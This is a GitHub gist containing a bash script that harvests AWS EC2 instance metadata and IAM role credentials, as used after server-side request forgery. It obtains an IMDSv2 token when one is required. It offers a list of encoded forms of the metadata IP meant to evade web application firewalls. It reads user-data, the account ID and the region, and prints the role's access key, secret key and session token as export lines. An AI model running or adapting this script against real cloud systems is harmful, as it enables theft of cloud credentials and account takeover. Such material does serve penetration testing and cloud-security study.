Last active
April 4, 2024 23:02
-
-
Save mohclips/a55713f028afc9ee1e1d4f21e7ff11e0 to your computer and use it in GitHub Desktop.
AWS SSRF metadata and creds
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| get_key_value() { | |
| echo "$1" | grep "$2" | cut -d ':' -f 2 | cut -d '"' -f 2 | |
| } | |
| strip_az_suffix() { | |
| echo "$1" | sed -e 's![a-z]$!!' | |
| } | |
| # gives 401 as missing token | |
| is_v2=$(curl -s -w "%{http_code}\n" http://169.254.169.254/ | grep 401) | |
| # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md?plain=1#L549 | |
| V2="" | |
| if [[ $is_v2 ]] ; then | |
| TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` | |
| V2="-H \"X-aws-ec2-metadata-token:$TOKEN\"" | |
| fi | |
| # pick and anti-waf endpoint | |
| # http://instance-data | |
| # http://169.254.169.254 | |
| # http://169.254.169.254.nip.io/ | |
| # http://425.510.425.510 Dotted decimal with overflow | |
| # http://2852039166 Dotless decimal | |
| # http://7147006462 Dotless decimal with overflow | |
| # http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal | |
| # http://0xA9FEA9FE Dotless hexadecimal | |
| # http://0x41414141A9FEA9FE Dotless hexadecimal with overflow | |
| # http://0251.0376.0251.0376 Dotted octal | |
| # http://0251.00376.000251.0000376 Dotted octal with padding | |
| # http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal) | |
| # http://[::ffff:a9fe:a9fe] IPV6 Compressed | |
| # http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded | |
| # http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4 | |
| # http://[fd00:ec2::254] IPV6 | |
| CURL="curl --silent --connect-timeout 1 --fail $V2 http://2852039166" | |
| echo -e "\n\n### paths" | |
| $CURL/latest/meta-data | sed -e 's/^/# /' | |
| echo -e "\n\n### user-data" | |
| $CURL/latest/user-data | sed -e 's/^/# /' | |
| echo -e "\n\n### Account Id" | |
| info=$($CURL/latest/meta-data/identity-credentials/ec2/info) | |
| if [ -n "$info" ] ; then | |
| cat<<EOF | |
| export AWS_ACCOUNT_ID=$(get_key_value "$info" "AccountId") | |
| EOF | |
| fi | |
| echo -e "\n\n### az" | |
| availability_zone=$($CURL/latest/meta-data/placement/availability-zone) | |
| if [ -n "$availability_zone" ]; then | |
| cat<<EOF | |
| export AWS_DEFAULT_REGION=$(strip_az_suffix "$availability_zone") | |
| EOF | |
| fi | |
| echo -e "\n\n### security creds" | |
| # https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/ | |
| ROLE=$($CURL/latest/meta-data/iam/security-credentials) | |
| #$CURL/latest/meta-data/iam/security-credentials/$ROLE | |
| credentials=$($CURL/latest/meta-data/iam/security-credentials/$ROLE) | |
| if [ -n "$credentials" ]; then | |
| cat<<EOF | |
| export AWS_EC2_ROLE=$ROLE | |
| export AWS_ACCESS_KEY_ID=$(get_key_value "$credentials" "AccessKeyId") | |
| export AWS_SECRET_ACCESS_KEY=$(get_key_value "$credentials" "SecretAccessKey") | |
| export AWS_SESSION_TOKEN=$(get_key_value "$credentials" "Token") | |
| EOF | |
| fi | |
| echo "" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment